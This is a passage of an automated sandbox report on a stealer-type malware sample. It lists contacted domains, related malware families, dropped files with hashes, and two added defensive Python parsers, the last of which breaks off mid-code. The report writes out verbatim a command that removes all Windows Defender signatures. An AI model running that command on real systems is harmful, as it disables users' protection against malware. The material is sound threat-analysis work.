                                                                                                                                                                                                      https://html.spec.whatwg.org/multipage/cmd.exe, 00000001.00000002.2097860677.000001C9169B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://www.ifeng.com/cmd.exe, 00000001.00000002.2100068134.000001C9179B8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningscmd.exe, 00000001.00000002.2098872517.000001C916F80000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2098654232.000001C916D30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://www.zhihu.com/cmd.exe, 00000001.00000002.2100068134.000001C9179C8000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2100068134.000001C917A04000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchcmd.exe, 00000001.00000003.1935481751.000001C9168CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
162.159.128.233 | discord.com | United States | 13335 | CLOUDFLARENETUS | false

IP
127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1561562
Start date and time: 2024-11-23 19:43:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 31s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 86
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: cmd.exe
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winEXE@135/56@2/3
EGA Information:
• Successful, ratio: 40%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 95
• Number of non-executed functions: 148
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
• Excluded IPs from analysis (whitelisted): 172.217.17.67, 2.18.109.164
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, gstatic.com, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target mshta.exe, PID 7516 because there are no executed functions
• Execution Graph export aborted for target powershell.exe, PID 7484 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 8300 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtQueryVolumeInformationFile calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: cmd.exe
Time | Type | Description
13:44:06 | API Interceptor | 118x Sleep call for process: powershell.exe modified
13:44:08 | API Interceptor | 2x Sleep call for process: svchost.exe modified
13:44:09 | API Interceptor | 5x Sleep call for process: WMIC.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
208.95.112.1 | z81zEuzkJPHHV3KYua.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | Listing_error_15_code_file-002.jar | malicious | Caesium Obfuscator, STRRAT | ip-api.com/json/
208.95.112.1 | Listing_error_15_code_file-002.jar | malicious | Caesium Obfuscator, STRRAT | ip-api.com/json/
208.95.112.1 | NeftPaymentError_details__Emdtd22102024_jpg.jar | malicious | Caesium Obfuscator, STRRAT | ip-api.com/json/
208.95.112.1 | Wire slip account payable.pif.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | HnJdZm51Xl.exe | malicious | Amadey, Clipboard Hijacker | ip-api.com/line/
208.95.112.1 | file.exe | malicious | JasonRAT | ip-api.com/json/?fields=11827
208.95.112.1 | Fulloption_V2.1.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | BoostFPS.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | New_Order_Inquiry.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
162.159.128.233 | file.exe | malicious | LummaC, Glupteba, PureLog Stealer, RisePro Stealer, SmokeLoader, Stealc, zgRAT | discord.com/phpMyAdmin/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ip-api.com | z81zEuzkJPHHV3KYua.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | Listing_error_15_code_file-002.jar | malicious | Caesium Obfuscator, STRRAT | 208.95.112.1
ip-api.com | Listing_error_15_code_file-002.jar | malicious | Caesium Obfuscator, STRRAT | 208.95.112.1
ip-api.com | NeftPaymentError_details__Emdtd22102024_jpg.jar | malicious | Caesium Obfuscator, STRRAT | 208.95.112.1
ip-api.com | Wire slip account payable.pif.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | http://christians-google-sh-97m2.glide.page/dl/d0a5f4 | malicious | Unknown | 208.95.112.2
ip-api.com | HnJdZm51Xl.exe | malicious | Amadey, Clipboard Hijacker | 208.95.112.1
ip-api.com | file.exe | malicious | JasonRAT | 208.95.112.1
ip-api.com | Fulloption_V2.1.exe | malicious | XWorm | 208.95.112.1
ip-api.com | BoostFPS.exe | malicious | XWorm | 208.95.112.1
discord.com | spacers.exe | malicious | Unknown | 162.159.138.232
discord.com | EternalPredictor.exe | malicious | Blank Grabber, Skuld Stealer, XWorm | 162.159.128.233
discord.com | program.exe | malicious | Blank Grabber | 162.159.137.232
discord.com | RuntimeusererVers.exe | malicious | Python Stealer | 162.159.138.232
discord.com | NEVER OPEN!.exe | malicious | Python Stealer, Empyrean, Discord Token Stealer | 162.159.137.232
discord.com | HeilHitler.exe | malicious | Blank Grabber | 162.159.128.233
discord.com | file.exe | malicious | CStealer | 162.159.138.232
discord.com | B78DGDwttv.exe | malicious | SilverRat | 162.159.135.232
discord.com | YDW0S5K7hi.exe | malicious | SilverRat | 162.159.137.232
discord.com | cDRgXaadjD.exe | malicious | SilverRat | 162.159.128.233
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TUT-ASUS | z81zEuzkJPHHV3KYua.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | Listing_error_15_code_file-002.jar | malicious | Caesium Obfuscator, STRRAT | 208.95.112.1
TUT-ASUS | Listing_error_15_code_file-002.jar | malicious | Caesium Obfuscator, STRRAT | 208.95.112.1
TUT-ASUS | NeftPaymentError_details__Emdtd22102024_jpg.jar | malicious | Caesium Obfuscator, STRRAT | 208.95.112.1
TUT-ASUS | Wire slip account payable.pif.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | http://christians-google-sh-97m2.glide.page/dl/d0a5f4 | malicious | Unknown | 208.95.112.2
TUT-ASUS | HnJdZm51Xl.exe | malicious | Amadey, Clipboard Hijacker | 208.95.112.1
TUT-ASUS | file.exe | malicious | JasonRAT | 208.95.112.1
TUT-ASUS | Fulloption_V2.1.exe | malicious | XWorm | 208.95.112.1
TUT-ASUS | BoostFPS.exe | malicious | XWorm | 208.95.112.1
CLOUDFLARENETUS | http://elizgallery.com/js.php | malicious | Unknown | 172.64.41.3
CLOUDFLARENETUS | https://elizgallery.com/nazvanie.js | malicious | Unknown | 104.22.0.204
CLOUDFLARENETUS | file.exe | malicious | LummaC Stealer | 172.67.162.84
CLOUDFLARENETUS | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 172.67.162.84
CLOUDFLARENETUS | https://myqrcode.mobi/qr/3c3aa5e1/view | malicious | Unknown | 172.67.20.8
CLOUDFLARENETUS | file.exe | malicious | LummaC Stealer | 172.67.162.84
CLOUDFLARENETUS | file.exe | malicious | LummaC Stealer | 172.67.162.84
CLOUDFLARENETUS | file.exe | malicious | LummaC Stealer | 104.21.33.116
CLOUDFLARENETUS | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 172.67.223.140
CLOUDFLARENETUS | Aquantia_Installer.exe | malicious | LummaC Stealer | 172.67.155.47
No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Users\user\AppData\Local\Temp\_MEI72642\VCRUNTIME140.dll | NEVER OPEN!.exe | malicious | Python Stealer, Empyrean, Discord Token Stealer |
C:\Users\user\AppData\Local\Temp\_MEI72642\VCRUNTIME140.dll | HeilHitler.exe | malicious | Blank Grabber |
C:\Users\user\AppData\Local\Temp\_MEI72642\VCRUNTIME140.dll | meN9qeS2DE.exe | malicious | XWorm |
C:\Users\user\AppData\Local\Temp\_MEI72642\VCRUNTIME140.dll | client1.exe | malicious | Unknown |
C:\Users\user\AppData\Local\Temp\_MEI72642\VCRUNTIME140.dll | qbE2mhhzCq.exe | malicious | Blank Grabber |
C:\Users\user\AppData\Local\Temp\_MEI72642\VCRUNTIME140.dll | UwOcZADSmi.exe | malicious | AsyncRAT |
C:\Users\user\AppData\Local\Temp\_MEI72642\VCRUNTIME140.dll | IyWKJMlCXg.exe | malicious | XWorm |
C:\Users\user\AppData\Local\Temp\_MEI72642\VCRUNTIME140.dll | SecuriteInfo.com.Python.Stealer.1545.20368.28754.exe | malicious | Python Stealer, CStealer |
C:\Users\user\AppData\Local\Temp\_MEI72642\VCRUNTIME140.dll | JdHvcxG4Up.exe | malicious | Unknown |
C:\Users\user\AppData\Local\Temp\_MEI72642\VCRUNTIME140.dll | souFnS89FP.exe | malicious | Unknown |
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 1310720
Entropy (8bit): 1.3073754776961999
Encrypted: false
SSDEEP: 3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrX:KooCEYhgYEL0In
MD5: 078074DD21AE3EA3C2141F30C129130C
SHA1: 4B390B0B388F735AEA1FFC2237D5ACBCA58475E2
SHA-256: 78345203239883277B905126AB288BA8C036187BF0959F23B747BB2E71082125
SHA-512: BC2A10C5AEE5E65D9F78184706FF2C1CCA1F3634A0E30947404AF2E2BE8435B0491E443A644A8D7D1EA24B7C372B83BDF779652A58B1007DEB76954F0CFCE993
Malicious: false
Preview: z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

Process: C:\Windows\System32\svchost.exe
File Type: Extensible storage engine DataBase, version 0x620, checksum 0xa9146506, page size 16384, DirtyShutdown, Windows version 10.0
Category: dropped
Size (bytes): 1310720
Entropy (8bit): 0.4221940938823745
Encrypted: false
SSDEEP: 1536:RSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Raza/vMUM2Uvz7DO
MD5: 478E16E0DCDEEBCB6F19E1277A7774BD
                                                                                                                                                                                                                                    SHA1:8E181321C1A2BBBDD281020EFE34D6028819542A
                                                                                                                                                                                                                                    SHA-256:DCF2B45C19E7FA8B3674DC572273E8FBF1D1949F7B3904E5CEB2966CAEB008F2
                                                                                                                                                                                                                                    SHA-512:2FF0E2C5B6D61516FE44159F8D6A77A1986D52E6654EC538970AE4A8D7AC265EB7E2CBAB6907815847F510033D912A04E66F6B960A95CE0B1DC61234AB278701
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:..e.... .......A.......X\...;...{......................0.!..........{A..,...|..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{.......................................,...|...................D...,...|#..........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):16384
                                                                                                                                                                                                                                    Entropy (8bit):0.0768593488031834
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:PyYeaPilhvejjn13a/+p73yuitlAllcVO/lnlZMxZNQl:KzPhGj53q+p7cAOewk
                                                                                                                                                                                                                                    MD5:547A6FDACE5DDA75CB5AD9B592E1CD79
                                                                                                                                                                                                                                    SHA1:5965540050FD9B5347E16BD9162E45B5C3CCC64E
                                                                                                                                                                                                                                    SHA-256:997F210C7BE39C537266EB8BB48BAD4E25B3E046415A5FD28E3B42E3F4C1F493
                                                                                                                                                                                                                                    SHA-512:73CEAE18BDC48B22026E25F0F5E920E595CAEF322C1F7546D7144D385CA03B17059605F00EE5802A6D6EE7A92F6C21231A87DE554377B46B4CC18F926F240CBE
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:+........................................;...{...,...|#......{A..............{A......{A..........{A].................D...,...|#.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):64
                                                                                                                                                                                                                                    Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:@...e...........................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):708675
                                                                                                                                                                                                                                    Entropy (8bit):7.927404647883676
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12288:9yl1CfYKs9fNtva50jvNVqzE2cpTzufAo1YVJYJ22wpS6c1P705VwH0F7Mpx+i79:9ylIbQtvnTNVqzzcpTy1YVJv2wpqP70q
                                                                                                                                                                                                                                    MD5:5EA6EB9286574EEA1B18CFA8861CDE9B
                                                                                                                                                                                                                                    SHA1:3025097DC968EC64738E3AECBD64C2C1C97393FB
                                                                                                                                                                                                                                    SHA-256:522CCB7D718E32C2DD5DDACBA2FBCFE285020EA19F631A1504990BA0DD5C4CD4
                                                                                                                                                                                                                                    SHA-512:A3CEEAC00FB9E5A323F4A3401DEFA60459F8139CFD0862CD41A94F5C566357FF9CE2BCA618CC2E959B5424C468FD290893D0FA3D098B8CEFBE9EBA4F396B6BD1
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....e....Y.......Lw..#.t......y.o.n..%....w.U....@B......@.A.e.P.....r..Fx.. .}...;.u.7.@V..{.....E....i.N.9.....B.ln.....V...i3C.T..Y.L...:.~.p..(...+h.}.....3v.....K..=....(...>az.......jL.+...{z..Z..@..+..I....cGO..QO.e....O6}..5......N..7.M....M../=:....Hi....+h..i.:......Jc..p...=....[?...l.)0.....>}.....h...1....../z2^0...W|.....c...i......?.9....v..?....1c..'3.........9..Y...X.r..}.j...?.w..}...a|.;'..=.e....nKs..g...I.........+.}@.s..Z.`...=nM.=.=nI...-.5c6?.{.=,n.....a.yh.zsF..nib...#......4....b.......96o....]-g....R...7...nL..oH....}..v.{...|....X.|k...<.y.Y...y..........]...8...4wG.....6..u....6..KoI.w.}..si..`.}..6...&.....lwMfl.S{.......Z...2......._KK....Y....5..X.9...[.[_.a..u....yC..%Wd......]....L.Gll..]..il.+r..v....f.7.~.>.]b..>h/..._bk.....Z..lny.^..7..Z....q..[.wn1.O...%...e9...9.\].k1..i..6....,F;
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe
                                                                                                                                                                                                                                    File Type:RAR archive data, v5
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):698334
                                                                                                                                                                                                                                    Entropy (8bit):7.999714852048684
                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                    SSDEEP:12288:MVIOn835AyRimlBu9gMHC9tXkSjESYfJTrRyTf2Kgg24Y0gdLf/Wp+RHZoN4UsDr:zOn835DimlBu9HCvkSjExfJPRy00gxfp
                                                                                                                                                                                                                                    MD5:CD2B19752D898B27F891D8A71A08E704
                                                                                                                                                                                                                                    SHA1:962299F9D6AD60CF20572534BAA746F1C065DBC4
                                                                                                                                                                                                                                    SHA-256:14F285FB9D3A4E137013710D94FCF612E65DFA859187ED8F621860A14EF0E6FD
                                                                                                                                                                                                                                    SHA-512:710067991C6496AC727530D67D4FF45C8B79A2D53FA88EF92754F775EFE06D5135BB2A25BC353935A71EEBBF8B83D0CF913BD4EC8057A8A939BE10F97933F905
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Preview:Rar!........!.......3.).F.B.5.$..DT\.?...D../...O..0{.wq...A.....pO....7..E._68.....u.A..,..&..j..l..y..6..=.U..y.%.c...?...G0....2..moB5.xV...J.,.........M.N.j.#...w....n.................. N.#/b.....O.S.R..m.$!...V.J.>0.....*...v.....2..IM.i9..l=..s.Lob..M.mP...v.'..X&l.El...z.j^.25.v.F.e..SG}.....$|.....sIpp.{0..I..U.....] ..qm..%..i....L...`..wq;]......).s.u..Q.m...2.rq...eAN........4..P>....$........*.... AHg....N..($.o.I...Q..`S.Y....>9...#....0.....s..H".;.I..X........H..t..9...E]g.S.'.....?.......*#.Q.../.%../LG&tm.......u.2.H...3...../..a.......3p.qF...t....Ft.$[..y..*...;........;..6/...`..YA..b..8.."n..'.....g....t`..?'.....*.B....2C8..X2.R......HT.9..IJ$.^.I..._}..2......W..`.@...q!..YC&S.....I....,V.<..&..=.......3O..NS.lS.v[w** ....4.....|....N..........uU..{D.t.;..I=.2.v.o...^.$.L...0Tc.......F...k........*.`kv..G.[...J...q..>.G9.>....y.......pz...o<...~|Q.M...D.>.!./3....b$..:4{...;....d!0k..+......u.1`.c..U...U,.x. .2
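The record above is the exfiltration stage: rar.exe, unpacked into a PyInstaller _MEI temp directory, produced a RAR v5 archive that the sandbox marks Encrypted with entropy 7.9997, the profile of a password-protected archive with encrypted headers. The following triage script is an added example for this report, not code from the sample or from Joe Sandbox. It parses the first RAR5 block after the signature, verifies its CRC32, reports whether that block is the archive encryption header (present only when headers are encrypted, i.e. rar -hp rather than -p), and computes the same 8-bit Shannon entropy the report lists. The archives it runs on are constructed in memory (zero salt, no real payload) and are not the dropped file; the format facts it relies on are the RAR5 signature, the block layout CRC32 / header size (vint) / header type (vint) / header flags (vint), and header types 1 (main archive) and 4 (archive encryption).

```python
"""Triage a dropped RAR archive: RAR5? header-encrypted? how random?

Added example for this sandbox report; not the malware's or Joe Sandbox's code.
Samples are constructed in memory, not the real dropped file.
"""
import math
import struct
import zlib
from collections import Counter
from typing import Dict, Optional, Tuple

RAR5_SIGNATURE = b"Rar!\x1a\x07\x01\x00"
RAR4_SIGNATURE = b"Rar!\x1a\x07\x00"
HEADER_TYPES = {1: "main archive", 2: "file", 3: "service", 4: "archive encryption", 5: "end of archive"}
ARCHIVE_ENCRYPTION_HEADER = 4  # present as first block only when headers are encrypted (rar -hp)


def encode_vint(n: int) -> bytes:
    """RAR5 variable-length integer: 7 data bits per byte, little-endian, high bit = continue."""
    out = bytearray()
    while True:
        b, n = n & 0x7F, n >> 7
        if n:
            out.append(b | 0x80)
        else:
            out.append(b)
            return bytes(out)


def decode_vint(buf: bytes, pos: int) -> Tuple[int, int]:
    """Return (value, position after the vint)."""
    value = shift = 0
    while True:
        b = buf[pos]
        pos += 1
        value |= (b & 0x7F) << shift
        if not b & 0x80:
            return value, pos
        shift += 7


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, 0.0 .. 8.0; the same measure as the report's 'Entropy (8bit)' column."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def first_block(data: bytes) -> Optional[Dict[str, object]]:
    """Parse the first RAR5 block after the signature and check its CRC32.

    Block layout: CRC32 (LE uint32, over everything from the header-size field to
    the end of the block), header size (vint), header type (vint), header flags (vint), fields.
    """
    if not data.startswith(RAR5_SIGNATURE):
        return None
    pos = len(RAR5_SIGNATURE)
    if len(data) < pos + 5:
        return {"type": None, "name": "truncated", "crc_ok": False}
    stored_crc = struct.unpack_from("<I", data, pos)[0]
    pos += 4
    size, body_start = decode_vint(data, pos)
    block_end = body_start + size
    crc_ok = (zlib.crc32(data[pos:block_end]) & 0xFFFFFFFF) == stored_crc
    htype, _ = decode_vint(data, body_start)
    return {"type": htype, "name": HEADER_TYPES.get(htype, "unknown"), "crc_ok": crc_ok}


def triage(data: bytes) -> Dict[str, object]:
    result: Dict[str, object] = {"format": "not rar", "first_block": None, "crc_ok": None,
                                 "encrypted_headers": False, "entropy": round(shannon_entropy(data), 4)}
    if data.startswith(RAR5_SIGNATURE):
        blk = first_block(data)
        result.update(format="rar5", first_block=blk["name"], crc_ok=blk["crc_ok"],
                      encrypted_headers=blk["crc_ok"] and blk["type"] == ARCHIVE_ENCRYPTION_HEADER)
    elif data.startswith(RAR4_SIGNATURE):
        result["format"] = "rar4"
    return result


# --- constructed samples (not the dropped file) ---------------------------------
def _block(htype: int, body: bytes) -> bytes:
    payload = encode_vint(htype) + encode_vint(0) + body          # type, flags = 0, type-specific fields
    sized = encode_vint(len(payload)) + payload
    return struct.pack("<I", zlib.crc32(sized) & 0xFFFFFFFF) + sized


# Archive encryption header: version 0 (AES-256), flags 0, KDF count 15, 16-byte salt (zeros here).
_ENC_BODY = encode_vint(0) + encode_vint(0) + bytes([15]) + bytes(16)
ENCRYPTED_SAMPLE = RAR5_SIGNATURE + _block(4, _ENC_BODY) + bytes(range(256)) * 4   # high-entropy stand-in for ciphertext
PLAIN_SAMPLE = RAR5_SIGNATURE + _block(1, encode_vint(0)) + b"A" * 1024          # main header (archive flags 0), low entropy
TAMPERED_SAMPLE = ENCRYPTED_SAMPLE[:8] + bytes([ENCRYPTED_SAMPLE[8] ^ 0xFF]) + ENCRYPTED_SAMPLE[9:]  # corrupted CRC byte

if __name__ == "__main__":
    for name, blob in (("encrypted", ENCRYPTED_SAMPLE), ("plain", PLAIN_SAMPLE), ("tampered", TAMPERED_SAMPLE)):
        print(name, triage(blob))
```

To run it against the real artifact, pass the dropped file's bytes to triage(). An archive created with only -p (data encrypted, headers in clear) starts with a main archive header and still lists file names; one created with -hp starts with the type-4 block, which is the case that matches Encrypted:true plus near-8.0 entropy in the record above.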
                                                                                                                                                                                                                                    Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                    Size (bytes):894
                                                                                                                                                                                                                                    Entropy (8bit):3.1167319285887203
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12:Q58KRBubdpkoPAGdjrZA7k9+MlWlLehW51IC4AW:QOaqdmOFdjrZ+kWResLI7
                                                                                                                                                                                                                                    MD5:C86ADFEDF6E325BDA1F55DC5A0664148
                                                                                                                                                                                                                                    SHA1:C7172E77444AE1EBE001A0B13FC05775538A4615
                                                                                                                                                                                                                                    SHA-256:EE86A413B13D1A620407065D875496D26774DC7D5FA9DAE011B91269887D512E
                                                                                                                                                                                                                                    SHA-512:0100BBB3873603197A10E4F7DEB8E27FB400D688FBBAF5FA7B4849012E918F2254D946360FBA80E7D663263087151CE36843325CF238D56838D7C86F8CF50DB8
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.M.p.C.m.d.R.u.n...e.x.e.". . .-.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s. .-.A.l.l..... .S.t.a.r.t. .T.i.m.e.:. .. S.a.t. .. N.o.v. .. 2.3. .. 2.0.2.4. .1.3.:.4.4.:.2.6.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....S.t.a.r.t.:. .M.p.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s.(.1.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. S.a.t. .. N.o.v. .. 2.3. .. 2.0.2.4. .1.3.:.4.4.:.2.6.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....
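The MpCmdRun.exe record above is the defence-evasion step in this chain: the decoded preview reads MpCmdRun: Command Line: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All followed by Start: MpRemoveDefinitions(1), which strips the Defender signature set. Because MpCmdRun writes that log itself, the file is a cheap forensic source even when process telemetry is missing. The parser below is an added example for this report, not code from the sample or from Joe Sandbox. It decodes the UTF-16 LE log, splits it on the dashed separators into entries, strips the U+200E marks the log puts around date parts (the ".." pairs in the preview), and flags any entry whose command line carries -RemoveDefinitions. The sample log is constructed to mirror the preview, with a benign -SignatureUpdate entry added for contrast; the on-disk path is an assumption (the system copy normally lives under %ProgramData%\Microsoft\Windows Defender\Support\MpCmdRun.log).

```python
"""Flag Windows Defender signature removal in MpCmdRun.log.

Added example for this sandbox report; not code from the sample or Joe Sandbox.
The sample log is constructed to mirror the dropped-file preview.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

SEPARATOR = "-" * 85
LRM = "\u200e"  # left-to-right mark; the real log wraps each date part in these

# Constructed sample: one signature-removal entry (as in the report), one benign update.
SAMPLE_LOG = "".join([
    "\r\n", SEPARATOR, "\r\n",
    'MpCmdRun: Command Line: "C:\\Program Files\\Windows Defender\\MpCmdRun.exe"  -RemoveDefinitions -All\r\n',
    f" Start Time: {LRM}Sat {LRM}Nov {LRM}23 {LRM}2024 13:44:26\r\n",
    "\r\n",
    "MpEnsureProcessMitigationPolicy: hr = 0x1\r\n",
    "Start: MpRemoveDefinitions(1)\r\n",
    f"MpCmdRun: End Time: {LRM}Sat {LRM}Nov {LRM}23 {LRM}2024 13:44:26\r\n",
    SEPARATOR, "\r\n",
    "\r\n", SEPARATOR, "\r\n",
    'MpCmdRun: Command Line: "C:\\Program Files\\Windows Defender\\MpCmdRun.exe"  -SignatureUpdate\r\n',
    f" Start Time: {LRM}Sat {LRM}Nov {LRM}23 {LRM}2024 13:50:02\r\n",
    f"MpCmdRun: End Time: {LRM}Sat {LRM}Nov {LRM}23 {LRM}2024 13:50:40\r\n",
    SEPARATOR, "\r\n",
])
SAMPLE_LOG_BYTES = b"\xff\xfe" + SAMPLE_LOG.encode("utf-16-le")  # BOM + UTF-16 LE, as on disk


@dataclass
class MpCmdRunEntry:
    command_line: str
    start_time: str = ""
    end_time: str = ""
    lines: List[str] = field(default_factory=list)


def decode_log(raw: bytes) -> str:
    """MpCmdRun.log is UTF-16 with a BOM; fall back to BOM-less UTF-16 LE."""
    if raw[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return raw.decode("utf-16")
    return raw.decode("utf-16-le")


_CMDLINE = re.compile(r"^MpCmdRun: Command Line:\s*(.*?)\s*$")
_START = re.compile(r"^\s*Start Time:\s*(.*?)\s*$")
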